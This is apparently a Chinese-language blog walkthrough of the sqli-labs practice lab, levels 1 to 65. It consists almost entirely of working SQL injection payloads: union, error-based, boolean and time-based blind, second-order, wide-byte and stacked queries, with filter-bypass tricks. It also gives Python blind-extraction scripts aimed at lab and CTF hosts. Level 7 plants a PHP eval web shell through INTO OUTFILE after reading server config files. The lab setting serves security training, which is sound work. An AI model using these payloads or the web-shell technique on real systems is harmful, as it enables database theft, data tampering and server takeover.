Level 1,2,3,4

判断:?id=1'and 1=2 --+
判断字段数:?id=1'order by 4 --+
?id=-1'union select 1,2,3 --+
判断数据库名:?id=-1'union select 1,version(),database() --+
注表名:?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security' --+
注字段名:?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name = 'users' --+
注数据:?id=-1'union select 1,2,group_concat(id," ",username," ",password) from users --+

2是数字类型的,不需要闭合

3用 ‘) –+闭合

4用”) –+闭合

Level5.6报错注入

数据库名:
?id=1'union select 1,count(*),
concat((select database()),"==",floor(rand(0)*2)) as a 
from information_schema.tables group by a --+
获取数据表的数量:
?id=1'union select 1,count(*),
concat((select count(table_name) from information_schema.tables where table_schema='security'),"==",floor(rand(0)*2)) as a 
from information_schema.tables where table_schema='security' group by a  --+
表名:
?id=1'union select 1,count(*),
concat((select table_name from information_schema.tables where table_schema='security' limit 0,1),"==",floor(rand(0)*2)) as a 
from information_schema.tables where table_schema='security' group by a  --+
字段名:
?id=1'union select 1,count(*),
concat((select column_name from information_schema.columns where table_name='users' limit 0,1),"==",floor(rand(0)*2)) as a 
from information_schema.tables where table_schema='security' group by a  --+
数据:
?id=1'union select 1,count(*),
concat((select concat(id," ",username," ",password) from users limit 0,1),"==",floor(rand(0)*2)) as a 
from information_schema.tables where table_schema='security' group by a  --+

6用双引号闭合

Level7

用loadfile函数读取Apache配置文件获取网站绝对路径,然后传一句话上去

?id=1'))and length((select load_file('/etc/apache2/sites-enabled/000-default.conf')))>100 --+
#load_file()用于读取文件
#apache:/etc/apache2/sites-enabled/000-default.conf
#nginx:/etc/nginx/nginx.conf
#获取到绝对路径为/var/www/html
import requests
​
for i in range(1, 100):
    left = 32
    right = 127
    mid = (left + right) // 2
    while left < right:
        url=f"http://192.168.2.54/Less-7/?id=1'))and ascii(substring((select load_file('/etc/apache2/sites-enabled/000-default.conf')),{i},{i}))>{mid} --+"
        if not requests.get(url).text.__contains__("You are in"):
            right = mid
        else:
            left = mid+1
        mid = (left + right) // 2
    print(chr(mid),end="")
?id=-1')) union select 1,2,'<?php @eval($_POST[shell]); ?>' into outfile '/var/www/html/Less-7/eastjun.php' --+

然后访问eastjun.php不会出现404就成功了,用蚁剑进行连接就可以了

(要去目录下把文件夹访问权限改一下,chmod 777 /var/www/html/Less-7,不然导出不会成功)

Level8 Bool盲注

测试:?id=1'or 1=1--+
数据库长度:?id=1'and length(database())>8 --+
数据库名:?id=1'and ascii(substring(database(),1,1))>114 --+
(security)
#写脚本进行注入
import requests
for i in range(1, 9):
    left = 32
    right = 127
    mid = (left + right) // 2
    while left < right:
        url=f"http://192.168.2.54/Less-8/?id=1'and ascii(substring(database(),{i},{i}))>{mid} --+"
        if not requests.get(url).text.__contains__("You are in..........."):
            right = mid
        else:
            left = mid+1
        mid = (left + right) // 2
    print(chr(mid),end="")
#注表名:
import requests
for i in range(1, 100):
    left = 32
    right = 127
    mid = (left + right) // 2
    while left < right:
        url=f"http://192.168.2.54/Less-8/?id=1'and ascii(substring((select group_concat(table_name) from information_schema.tables where table_schema='security'),{i},{i}))>{mid} --+"
        if not requests.get(url).text.__contains__("You are in..........."):
            right = mid
        else:
            left = mid+1
        mid = (left + right) // 2
    print(chr(mid),end="")

Level9,10时间盲注

?id=1'and if(1=1,sleep(10),1)--+
#写脚本进行注入
import requests
import time
​
for i in range(1, 9):
    left = 32
    right = 127
    mid = (left + right) // 2
    while left < right:
        url=f"http://192.168.2.54/Less-9/?id=1'and if(ascii(substring(database(),{i},{i}))>{mid},sleep(1),1)--+"
        start=time.time()
        requests.get(url, timeout=5).text.__contains__("You are in...........")
        t=time.time()-start
        if t<1:
            right = mid
        else:
            left = mid+1
        mid = (left + right) // 2
    print(chr(mid),end="")
#注表名
import requests
import time
​
for i in range(1, 100):
    left = 32
    right = 127
    mid = (left + right) // 2
    while left < right:
        url=f"http://192.168.2.54/Less-9/?id=1'and if(ascii(substring((select group_concat(table_name) from information_schema.tables where table_schema='security'),{i},{i}))>{mid},sleep(1),1)--+"
        start=time.time()
        requests.get(url, timeout=5).text.__contains__("You are in...........")
        t=time.time()-start
        if t<1:
            right = mid
        else:
            left = mid+1
        mid = (left + right) // 2
    print(chr(mid),end="")

10把闭合方式改为双引号

Level11,12

数据库名:
passwd=&uname=admin'and 1=2 union select version(),database()#
表名:
passwd=&uname=admin'and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'security'#
报错注入:
passwd=&uname=admin'and updatexml(1,concat(0x7e,(select database()),0x7e),1)#

12用双引号闭合

Level13.14报错注入

passwd=admin&uname=admin') and updatexml(1,concat(0x7e,database(),0x7e),1) --+

14用双引号闭合

Level15,16

Bool盲注

passwd=&uname=a'or length(database())>10--+

Level16

时间盲注

passwd=1&uname=admin")and if(length(database())>0,sleep(1),1) --+

Level17

报错注入

uname=admin&passwd=123456'and updatexml(1,concat(0x7e,database(),0x7e),1)--+

Level18.19

UA注入和Header注入,用Hackerbar把UA改一下就行了

EastJun' and updatexml(1,concat(0x7e,(select database()),0x7e),1) or 1='1

Level20,21

用admin+123456登录一下,登录不了去Level17改密码

然后用HackerBar改Cookie

uname=EastJun' and updatexml(1,concat(0x7e,(select database()),0x7e),1) or 1='1

21再加一层Base64

22闭合方式为双引号

Level23

用正则表达式过滤了#和–,用单引号闭合

?id=-1'union select 1,2,'3
?id=-1'union select 1,database(),'3
?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security
?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name = 'users
?id=-1'union select 1,(select group_concat(id,username,password) from users), '3

Level24

二次注入

先注册admin’#,密码随意

然后修改密码,admin的密码就会被修改

主要原因是注册时php对数据中的特殊字符进行了转义,转义完直接存储到数据库中,数据库将\’识别为’,第二次查询时会执行sql语句

也是可以注出数据的,就是比较麻烦

(2020.4.8:ctfshow上线了sqli-labs,写了个脚本把flag注出来了,因为懒得单独发个文章就直接把脚本放在这里了)

import requests
import time

url = "http://5b06fff6-e47a-4fa6-9653-adc081ddc256.challenge.ctf.show:8080/"

for i in range(1, 100):
    left = 32
    right = 127
    mid = (left + right) // 2
    while left < right:
        session = requests.session()
        uname = f"admin'and if(ascii(substring((select group_concat(flag4) from ctfshow.flag),{i},{i}))>{mid},sleep(1),1)#"
        data = {
            "password": "123456",
            're_password': '123456',
            'username': uname,
            "submit": "Register"
        }
        session.post(f"{url}login_create.php", data=data)

        data = {
            "login_password": "123456", 'login_user': uname
        }
        session.post(f"{url}login.php", data=data)
        data = {
            "current_password": "123456",
            "password": "123456",
            "re_password": "123456",
            'login_user': uname,
            "submit": "Reset"
        }
        start = time.time()
        session.post(f"{url}pass_change.php", data=data, timeout=5)
        t = time.time() - start
        if t < 1:
            right = mid
        else:
            left = mid + 1
        mid = (left + right) // 2
    print(chr(mid), end="")
#2021.4.9

Level25,25a

将and和or换成了””,用双写可以绕过,information那里有个or,要双写

25a为纯数字,不需要闭合

?id=1'anandd 1='1
?id=-1'union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema = 'security

Level 26,26a

报错:?id=1'^(updatexml(1,concat(0x7e,database(),0x7e),1))^'1
盲注:?id=1'^(length(database())>5)^'1
%0a代替空格:?id=1'anandd%0a1='1

Level27

报错:?id=1'^(updatexml(1,concat(0x7e,database(),0x7e),1))^'1
?id=1'^(updatexml(1,concat(0x7e,(seLect(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e),1))^'1
?id=1'^(updatexml(1,concat(0x7e,(seLect(group_concat(username,password))from(users)),0x7e),1))^'1
?id=1'and(extractvalue(1,concat(0x7e,(seLect(concat(username,',',password))from(users)where(id=1)),0x7e)))and'1'='1

Level27a

盲注(异或):?id=1"^(length(database())>10)^"1
(?id=1"^1^"1返回为True,?id=1"^0^"1返回为False)
盲注(或):?id=0"||length(database())>10="1
%0a代替空格:?id=0"uNion%0aseLect%0a1,2,"3

Level28,28a

尝试报错注入,但是并没有什么用,盲注还是可以的

报错:?id=1'^(updatexml(1,concat(0x7e,database(),0x7e),1))^'1
盲注:?id=1'^(length(database())>10)^'1
?id=0'||(length(database())>5)='1

Level29

报错注入:?id=0'||(updatexml(1,concat(0x7e,database(),0x7e),1))^'1
过滤空格用括号代替:
?id=0'||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema='security')),0x7e),1))^'1

Level30

盲注:?id=0"||(length(database())>10)="1

Level31

普通的注入:
?id=-1")union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
报错注入:
?id=1"^(updatexml(1,concat(0x7e,database(),0x7e),1))^"1
?id=1"^(updatexml(1,concat(0x7e,(select(group_concat(table_name))from information_schema.tables where table_schema='security'),0x7e),1))^"1

Level32,33宽字节注入

引号被转义,在引号%27前面加了个反斜杠%5c,可以用宽字节注入,在%5c前加上一个ascii码大于128的字符,mysql会认为这是一个汉字,所以只要在引号前加上%81就能吃掉这个反斜杠%5c,使得后面的引号变得有意义,后面注字段名的时候需要用到引号可以用16进制绕过

?id=-1%EF' union select 1,2,database() --+
?id=-1%81' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
?id=-1%EF' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=database() --+
?id=-1%EF' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+

Level34

还是宽字节,但是用的是POST,和GET方法不太一样,%df传不上去,用�代替%df可以注入

passwd=a&uname=admin�'or 1=1#

35不需要闭合,直接注,需要引号的时候用16进制绕一下

36和32一样

37和34一样

Level38,39,40 ,41堆叠注入

可以让mysql执行多条sql语句,用分号闭合,比如下面这个执行了他就把这条数据插入到数据库中了

?id=-1';insert users values(15,"eastjun","123456");--+

再去查id=15这条数据的时候就能查到eastjun的数据

39是不需要闭合的堆叠注入

?id=15;insert users values(16,"westjun","123456");--+

40的闭合方式为’)

?id=1');insert users values(17,"northjun","123456");--+

41不需要闭合

?id=18;insert users values(18,"southjun","123456");--+

Level42,43

是要我们登录,用万能钥匙’or 1=1–+确认注入点在password

password中输入反斜杠会有报错的回显,可以用报错注入,也有堆叠注入可以用

login_password=123456';insert users values(15,"eastjun","123456");--+&login_user=admin&mysubmit=Login

43用’)闭合

Level44,45

44,45与42,43的区别在于报错不回显,可以用盲注,堆叠注入也可以用

Level46

这里是传入一个名叫sort的参数,用于排序,源码中用了order by id,但是并没有对id进行任何的过滤,而且错误会回显,可以用报错注入,也可以用盲注:

?sort=updatexml(1,concat(0x7e,database(),0x7e),1)

Level47

报错注入,然后需要闭合

?sort=1'and updatexml(1,concat(0x7e,database(),0x7e),1)%23

Level48,49

错误不回显,要用盲注,比较简单的就时间盲注:

?sort=if(length(database())>0,sleep(1),1)

还可以用Bool盲注,rand(1=1)和rand(1=2)返回的顺序不同:

?sort=rand(length(database())>0)

这关报错的时候不会显示任何东西,可以用?sort=\试一下,这里可以用这个特点进行盲注

?sort=updatexml(1,if(length(database())>0,1,0x0),1)

49是字符型,要用单引号闭合

Level50,51,52,53

和46,47,48,49一样,然后这四个都可以用堆叠注入

Level54,55,56,57

和Level1一样,2是用)–+闭合,3是用’)–+闭合,4是用双引号闭合

Level58

?id=1'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = database()),0x7e),1) --+
​
?id=1'and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name = 'A63905CZCP'),0x7e),1) --+
​
?id=1'and updatexml(1,concat(0x7e,(select secret_21WB from A63905CZCP),0x7e),1) --+

Level59

?id=updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database()),0x7e),1)
​
?id=updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='VY8ZTG6ZIU'),0x7e),1)
​
?id=updatexml(1,concat(0x7e,(select secret_BYC8 from VY8ZTG6ZIU),0x7e),1)

Level60,61

60闭合方式为”),61闭合方式为’))

Level62,63,64,65

import requests
​
table=""
for i in range(1, 11):
    left = 32
    right = 127
    mid = (left + right) // 2
    while left < right:
        url=f"http://192.168.2.24/Less-62/?id=1')and ascii(substring((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},{i}))>{mid} --+"
        if not requests.get(url).text.__contains__("Angelina"):
            right = mid
        else:
            left = mid+1
        mid = (left + right) // 2
    table+=chr(mid)
print(table)
​
column=""
for i in range(1, 12):
    left = 32
    right = 127
    mid = (left + right) // 2
    while left < right:
        url=f"http://192.168.2.24/Less-62/?id=1')and ascii(substring((select column_name from information_schema.columns where table_name='{table}' limit 2,1),{i},{i}))>{mid} --+"
        if not requests.get(url).text.__contains__("Angelina"):
            right = mid
        else:
            left = mid+1
        mid = (left + right) // 2
    column+=chr(mid)
print(column)
​
for i in range(1, 25):
    left = 32
    right = 127
    mid = (left + right) // 2
    while left < right:
        url=f"http://192.168.2.24/Less-62/?id=1')and ascii(substring((select {column} from {table}),{i},{i}))>{mid} --+"
        if not requests.get(url).text.__contains__("Angelina"):
            right = mid
        else:
            left = mid+1
        mid = (left + right) // 2
    print(chr(mid),end="")
​

63用单引号闭合,64用))闭合,65用”)闭合

说点什么
支持Markdown语法
在"sqli-labs 1-65"已有2条评论
Loading...